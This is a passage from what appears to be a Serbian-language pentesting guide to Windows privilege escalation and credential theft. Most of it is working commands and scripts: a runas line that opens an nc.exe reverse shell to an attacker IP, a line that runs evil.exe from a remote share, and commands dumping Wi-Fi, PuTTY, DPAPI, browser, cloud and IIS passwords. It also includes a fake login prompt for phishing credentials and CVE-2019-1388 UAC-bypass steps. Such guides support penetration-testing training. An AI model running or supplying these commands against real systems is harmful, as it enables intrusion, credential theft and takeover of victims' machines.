Osim ako aplikacije ne komuniciraju sa Menadžerom kredencijala, ne mislim da je moguće da koriste kredencijale za dati resurs. Dakle, ako vaša aplikacija želi da koristi trezor, treba nekako da komunicira sa menadžerom kredencijala i zatraži kredencijale za taj resurs iz podrazumevanog skladišta trezora.
Koristite cmdkey da biste prikazali sačuvane kredencijale na mašini.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Zatim možete koristiti runas sa opcijom /savecred kako biste koristili sačuvane akreditive. Sledeći primer poziva udaljeni binarni fajl putem SMB deljenja.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Koristeći runas sa datim skupom akreditiva.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Napomena da mimikatz, lazagne, credentialfileview, VaultPasswordView, ili iz Empire Powershells module.
DPAPI
Data Protection API (DPAPI) pruža metodu za simetričnu enkripciju podataka, pretežno korišćenu unutar Windows operativnog sistema za simetričnu enkripciju asimetričnih privatnih ključeva. Ova enkripcija koristi tajnu korisnika ili sistema kako bi značajno doprinela entropiji.
DPAPI omogućava enkripciju ključeva putem simetričnog ključa koji se izvodi iz tajni korisničkog prijavljivanja. U scenarijima koji uključuju enkripciju sistema, koristi tajne autentifikacije domena sistema.
Enkriptovani korisnički RSA ključevi, koristeći DPAPI, čuvaju se u %APPDATA%\Microsoft\Protect\{SID} direktorijumu, gde {SID} predstavlja korisnički Security Identifier. DPAPI ključ, koji se nalazi zajedno sa glavnim ključem koji štiti korisničke privatne ključeve u istom fajlu, obično se sastoji od 64 bajta nasumičnih podataka. (Važno je napomenuti da je pristup ovom direktorijumu ograničen, sprečavajući listanje njegovog sadržaja putem dir komande u CMD, iako se može listati putem PowerShell-a).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
Možete koristiti mimikatz modul dpapi::masterkey sa odgovarajućim argumentima (/pvk ili /rpc) da ga dekriptujete.
Datoteke sa kredencijalima zaštićene glavnom lozinkom obično se nalaze u:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Možete koristiti mimikatz modul dpapi::cred sa odgovarajućim /masterkey za dekripciju.
Možete izvući mnoge DPAPI masterkeys iz memorije pomoću sekurlsa::dpapi modula (ako ste root).
{% content-ref url="dpapi-extracting-passwords.md" %} dpapi-extracting-passwords.md {% endcontent-ref %}
PowerShell Kredencijali
PowerShell kredencijali se često koriste za scripting i automatizaciju kao način za praktično čuvanje enkriptovanih kredencijala. Kredencijali su zaštićeni korišćenjem DPAPI, što obično znači da ih može dekriptovati samo isti korisnik na istom računaru na kojem su kreirani.
Da biste dekriptovali PS kredencijale iz datoteke koja ih sadrži, možete uraditi:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*
Sačuvane RDP konekcije
Možete ih pronaći na HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
i u HKCU\Software\Microsoft\Terminal Server Client\Servers\
Nedavno pokrenute komande
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Upravljač kredencijalima za udaljenu radnu površinu
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
Možete izvući mnoge DPAPI masterključeve iz memorije pomoću Mimikatz sekurlsa::dpapi modula
Sticky Notes
Ljudi često koriste aplikaciju StickyNotes na Windows radnim stanicama da sačuvaju lozinke i druge informacije, ne shvatajući da je to datoteka baze podataka. Ova datoteka se nalazi na C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite i uvek vredi pretražiti i ispitati.
AppCmd.exe
Napomena da da biste povratili lozinke iz AppCmd.exe morate biti Administrator i raditi pod visokim integritetom.
AppCmd.exe se nalazi u %systemroot%\system32\inetsrv\ direktorijumu.
Ako ova datoteka postoji, moguće je da su neka akreditivna podešavanja konfigurisana i mogu se povratiti.
Ovaj kod je izvučen iz PowerUP:
function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
# Check if appcmd.exe exists
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable
# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")
# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
# Get application pool name
$PoolName = $_
# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd
# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd
# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}
# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
# Get Virtual Directory Name
$VdirName = $_
# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd
# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd
# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}
# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}
SCClient / SCCM
Proverite da li C:\Windows\CCM\SCClient.exe postoji.
Instalateri se pokreću sa SYSTEM privilegijama, mnogi su ranjivi na DLL Sideloading (Informacije od https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Datoteke i Registar (Akreditivi)
Putty Akreditivi
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH ključevi u registru
SSH privatni ključevi mogu biti smešteni unutar registracijske ključeva HKCU\Software\OpenSSH\Agent\Keys, pa treba da proverite da li ima nečega zanimljivog tamo:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
Ako pronađete bilo koji unos unutar tog puta, verovatno će to biti sačuvani SSH ključ. Čuva se enkriptovan, ali se može lako dekriptovati koristeći https://github.com/ropnop/windows_sshagent_extract.
Više informacija o ovoj tehnici ovde: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
Ako ssh-agent servis nije pokrenut i želite da se automatski pokrene prilikom podizanja sistema, pokrenite:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
{% hint style="info" %}
Izgleda da ova tehnika više nije validna. Pokušao sam da kreiram neke ssh ključeve, dodam ih sa ssh-add i prijavim se putem ssh na mašinu. Registry HKCU\Software\OpenSSH\Agent\Keys ne postoji i procmon nije identifikovao korišćenje dpapi.dll tokom asimetrične autentifikacije ključeva.
{% endhint %}
Neprisutne datoteke
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Možete takođe pretraživati ove datoteke koristeći metasploit: post/windows/gather/enum_unattend
Primer sadržaja:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
SAM & SYSTEM rezervne kopije
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud kredencijali
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Potražite datoteku pod nazivom SiteList.xml
Cached GPP Pasword
Prethodno je postojala funkcija koja je omogućavala implementaciju prilagođenih lokalnih administratorskih naloga na grupi mašina putem Group Policy Preferences (GPP). Međutim, ova metoda je imala značajne sigurnosne nedostatke. Prvo, Group Policy Objects (GPOs), pohranjeni kao XML datoteke u SYSVOL, mogli su biti dostupni bilo kojem korisniku domena. Drugo, lozinke unutar ovih GPP-a, šifrovane sa AES256 koristeći javno dokumentovani podrazumevani ključ, mogle su biti dešifrovane od strane bilo kog autentifikovanog korisnika. Ovo je predstavljalo ozbiljan rizik, jer je moglo omogućiti korisnicima da dobiju povišene privilegije.
Da bi se umanjio ovaj rizik, razvijena je funkcija koja skenira lokalno keširane GPP datoteke koje sadrže "cpassword" polje koje nije prazno. Kada pronađe takvu datoteku, funkcija dešifruje lozinku i vraća prilagođeni PowerShell objekat. Ovaj objekat uključuje detalje o GPP-u i lokaciji datoteke, pomažući u identifikaciji i otklanjanju ove sigurnosne ranjivosti.
Pretražujte u C:\ProgramData\Microsoft\Group Policy\history ili u C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (pre W Vista) za ove datoteke:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
Da dešifrujete cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Koristeći crackmapexec za dobijanje lozinki:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS Web Config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Primer web.config sa kredencijalima:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
OpenVPN akreditivi
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]
$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Логови
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
Možete uvek zamoliti korisnika da unese svoje akreditive ili čak akreditive drugog korisnika ako mislite da ih može znati (imajte na umu da je traženje od klijenta direktno za akreditive zaista rizično):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Mogući nazivi datoteka koje sadrže akreditive
Poznate datoteke koje su pre nekog vremena sadržale lozinke u čistom tekstu ili Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
Pretražite sve predložene datoteke:
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Kredencijali u RecycleBin
Takođe treba da proverite Kantu za otpatke da biste potražili kredencijale unutar nje
Da opravite lozinke sačuvane od strane nekoliko programa možete koristiti: http://www.nirsoft.net/password_recovery_tools.html
Unutar registra
Ostali mogući ključevi registra sa kredencijalima
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Izvlačenje openssh ključeva iz registra.
Istorija pregledača
Trebalo bi da proverite baze podataka gde su sačuvane lozinke iz Chrome-a ili Firefox-a.
Takođe proverite istoriju, obeleživače i favorite pregledača, možda su neke lozinke sačuvane tamo.
Alati za izvlačenje lozinki iz pregledača:
- Mimikatz:
dpapi::chrome - SharpWeb
- SharpChromium
- SharpDPAPI
Prepisivanje COM DLL-a
Component Object Model (COM) je tehnologija ugrađena u Windows operativni sistem koja omogućava međusobnu komunikaciju između softverskih komponenti različitih jezika. Svaka COM komponenta je identifikovana putem ID-a klase (CLSID), a svaka komponenta izlaže funkcionalnost putem jednog ili više interfejsa, identifikovanih putem ID-a interfejsa (IIDs).
COM klase i interfejsi su definisani u registru pod HKEY_CLASSES_ROOT\CLSID i HKEY_CLASSES_ROOT\Interface. Ovaj registar se kreira spajanjem HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.
Unutar CLSID-ova ovog registra možete pronaći podregistar InProcServer32 koji sadrži podrazumevanu vrednost koja pokazuje na DLL i vrednost pod nazivom ThreadingModel koja može biti Apartment (Jednoprocesni), Free (Višedretveni), Both (Jedan ili Više) ili Neutral (Neutralan prema nitima).
U suštini, ako možete prepisati bilo koji od DLL-ova koji će biti izvršeni, mogli biste povećati privilegije ako taj DLL bude izvršen od strane drugog korisnika.
Da biste saznali kako napadači koriste COM Hijacking kao mehanizam postojanosti, proverite:
{% content-ref url="com-hijacking.md" %} com-hijacking.md {% endcontent-ref %}
Generička pretraga lozinki u datotekama i registru
Pretražite sadržaj datoteka
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Pretražite datoteku sa određenim imenom datoteke
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Pretražite registar za imena ključeva i lozinke
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Alati koji traže lozinke
MSF-Credentials Plugin je msf dodatak koji sam kreirao da automatski izvrši svaki metasploit POST modul koji traži kredencijale unutar žrtve.
Winpeas automatski traži sve datoteke koje sadrže lozinke pomenute na ovoj stranici.
Lazagne je još jedan odličan alat za ekstrakciju lozinki iz sistema.
Alat SessionGopher traži sesije, korisnička imena i lozinke nekoliko alata koji čuvaju ove podatke u čistom tekstu (PuTTY, WinSCP, FileZilla, SuperPuTTY i RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Zamislite da proces koji se izvršava kao SYSTEM otvara novi proces (OpenProcess()) sa potpunim pristupom. Taj isti proces takođe kreira novi proces (CreateProcess()) sa niskim privilegijama, ali nasleđuje sve otvorene handle-ove glavnog procesa.
Zatim, ako imate potpun pristup procesu sa niskim privilegijama, možete uhvatiti otvoreni handle za privilegovani proces kreiran sa OpenProcess() i ubaciti shellcode.
Pročitajte ovaj primer za više informacija o tome kako otkriti i iskoristiti ovu ranjivost.
Pročitajte ovaj drugi post za potpunije objašnjenje o tome kako testirati i zloupotrebljavati više otvorenih handle-ova procesa i niti nasleđenih sa različitim nivoima dozvola (ne samo potpunim pristupom).
Named Pipe Client Impersonation
Deljeni memorijski segmenti, poznati kao cevi, omogućavaju komunikaciju između procesa i prenos podataka.
Windows pruža funkciju pod nazivom Named Pipes, koja omogućava nepovezanim procesima da dele podatke, čak i preko različitih mreža. Ovo podseća na arhitekturu klijent/server, sa ulogama definisanim kao server cevi i klijent cevi.
Kada klijent šalje podatke kroz cev, server koji je postavio cev ima mogućnost da preuzme identitet klijenta, pod uslovom da ima potrebna SeImpersonate prava. Identifikovanje privilegovanog procesa koji komunicira putem cevi koji možete imitirati pruža priliku da dobijete više privilegije preuzimanjem identiteta tog procesa kada on interaguje sa cevima koje ste postavili. Za uputstva o izvršavanju takvog napada, korisni vodiči se mogu naći ovde i ovde.
Takođe, sledeći alat omogućava presretanje komunikacije cevi sa alatom kao što je burp: https://github.com/gabriel-sztejnworcel/pipe-intercept i ovaj alat omogućava da se prikažu i vide sve cevi kako bi se pronašle priveske https://github.com/cyberark/PipeViewer
Misc
Monitoring Command Lines for passwords
Kada dobijete shell kao korisnik, mogu postojati zakazani zadaci ili drugi procesi koji se izvršavaju i prolaze kredencijale putem komandne linije. Skripta ispod hvata komandne linije procesa svake dve sekunde i upoređuje trenutnu situaciju sa prethodnom, prikazujući sve razlike.
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Krađa lozinki iz procesa
Od korisnika sa niskim privilegijama do NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC zaobilaženje
Ako imate pristup grafičkom interfejsu (putem konzole ili RDP) i UAC je omogućen, u nekim verzijama Microsoft Windows-a moguće je pokrenuti terminal ili bilo koji drugi proces kao "NT\AUTHORITY SYSTEM" iz korisnika bez privilegija.
To omogućava eskalaciju privilegija i zaobilaženje UAC-a istovremeno koristeći istu ranjivost. Pored toga, nije potrebno instalirati ništa, a binarni fajl koji se koristi tokom procesa je potpisan i izdat od strane Microsoft-a.
Neki od pogođenih sistema su sledeći:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
Da bi se iskoristila ova ranjivost, potrebno je izvršiti sledeće korake:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
Imate sve potrebne datoteke i informacije u sledećem GitHub repozitorijumu:
https://github.com/jas502n/CVE-2019-1388
Od Administratorskog Srednjeg do Visokog Integriteta / UAC Bypass
Pročitajte ovo da naučite o Integritetskim Nivima:
{% content-ref url="integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}
Zatim pročitajte ovo da naučite o UAC i UAC bypass-ima:
{% content-ref url="../authentication-credentials-uac-and-efs/uac-user-account-control.md" %} uac-user-account-control.md {% endcontent-ref %}
Od Visokog Integriteta do Sistema
Nova usluga
Ako već radite na procesu sa Visokim Integritetom, prelazak na SYSTEM može biti lak samo kreiranjem i izvršavanjem nove usluge:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
AlwaysInstallElevated
Iz procesa visokog integriteta možete pokušati da omogućite AlwaysInstallElevated registry unose i instalirate reverznu ljusku koristeći .msi omotač.
Više informacija o registrovnim ključevima koji su uključeni i kako instalirati .msi paket ovde.
High + SeImpersonate privilegija do System
Možete pronaći kod ovde.
Od SeDebug + SeImpersonate do punih Token privilegija
Ako imate te token privilegije (verovatno ćete ovo pronaći u već postojećem procesu visokog integriteta), moći ćete da otvorite gotovo bilo koji proces (nezaštićene procese) sa SeDebug privilegijom, kopirate token procesa i kreirate arbitrarni proces sa tim tokenom.
Korišćenjem ove tehnike obično se izabere bilo koji proces koji se izvršava kao SYSTEM sa svim token privilegijama (da, možete pronaći SYSTEM procese bez svih token privilegija).
Možete pronaći primer koda koji izvršava predloženu tehniku ovde.
Named Pipes
Ova tehnika se koristi od strane meterpreter-a za eskalaciju u getsystem. Tehnika se sastoji u kreiranju cevi i zatim kreiranju/zloupotrebi usluge za pisanje na tu cev. Tada će server koji je kreirao cev koristeći SeImpersonate privilegiju moći da imituje token klijenta cevi (uslugu) dobijajući SYSTEM privilegije.
Ako želite da saznate više o named pipes, trebate pročitati ovo.
Ako želite da pročitate primer kako preći iz visokog integriteta u System koristeći named pipes, trebate pročitati ovo.
Dll Hijacking
Ako uspete da otmete dll koji se učitava od strane procesa koji se izvršava kao SYSTEM, moći ćete da izvršite proizvoljan kod sa tim dozvolama. Stoga je Dll Hijacking takođe koristan za ovu vrstu eskalacije privilegija, a, osim toga, daleko je lakše postići iz procesa visokog integriteta jer će imati dozvole za pisanje na folderima koji se koriste za učitavanje dll-ova.
Možete saznati više o Dll hijacking ovde.
Od Administratora ili Mrežne Usluge do System
{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}
Od LOCAL SERVICE ili NETWORK SERVICE do punih privilegija
Pročitajte: https://github.com/itm4n/FullPowers
Više pomoći
Korisni alati
Najbolji alat za traženje Windows lokalnih vektora eskalacije privilegija: WinPEAS
PS
PrivescCheck
PowerSploit-Privesc(PowerUP) -- Proverite za pogrešne konfiguracije i osetljive datoteke (proverite ovde). Otkriveno.
JAWS -- Proverite za neke moguće pogrešne konfiguracije i prikupite informacije (proverite ovde).
privesc -- Proverite za pogrešne konfiguracije
SessionGopher -- Ekstrahuje informacije o sačuvanim sesijama iz PuTTY, WinSCP, SuperPuTTY, FileZilla i RDP. Koristite -Thorough u lokalnom režimu.
Invoke-WCMDump -- Ekstrahuje kredencijale iz Credential Manager-a. Otkriveno.
DomainPasswordSpray -- Prskanje prikupljenih lozinki širom domena
Inveigh -- Inveigh je PowerShell ADIDNS/LLMNR/mDNS/NBNS lažnjak i alat za napad "čovek u sredini".
WindowsEnum -- Osnovna privesc Windows enumeracija
Sherlock ~~~~ -- Pretražuje poznate privesc ranjivosti (DEPRECATED za Watson)
WINspect -- Lokalne provere (Potrebna su administratorska prava)
Exe
Watson -- Pretražuje poznate privesc ranjivosti (mora se kompajlirati koristeći VisualStudio) (prekompajlirano)
SeatBelt -- Enumerira host tražeći pogrešne konfiguracije (više alat za prikupljanje informacija nego privesc) (mora se kompajlirati) (prekompajlirano)
LaZagne -- Ekstrahuje kredencijale iz mnogih softvera (prekompajlirani exe na github-u)
SharpUP -- Port PowerUp-a u C#
Beroot ~~~~ -- Proverite za pogrešne konfiguracije (izvršni prekompajliran na github-u). Nije preporučeno. Ne radi dobro na Win10.
Windows-Privesc-Check -- Proverite za moguće pogrešne konfiguracije (exe iz python-a). Nije preporučeno. Ne radi dobro na Win10.
Bat
winPEASbat -- Alat kreiran na osnovu ovog posta (ne zahteva accesschk da bi ispravno radio, ali može ga koristiti).
Local
Windows-Exploit-Suggester -- Čita izlaz systeminfo i preporučuje funkcionalne eksploite (lokalni python)
Windows Exploit Suggester Next Generation -- Čita izlaz systeminfo i preporučuje funkcionalne eksploite (lokalni python)
Meterpreter
multi/recon/local_exploit_suggestor
Morate kompajlirati projekat koristeći ispravnu verziju .NET (vidi ovo). Da biste videli instaliranu verziju .NET na žrtvovom hostu, možete uraditi:
C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line
Bibliografija
- http://www.fuzzysecurity.com/tutorials/16.html\
- http://www.greyhathacker.net/?p=738\
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html\
- https://github.com/sagishahar/lpeworkshop\
- https://www.youtube.com/watch?v=_8xJaaQlpBo\
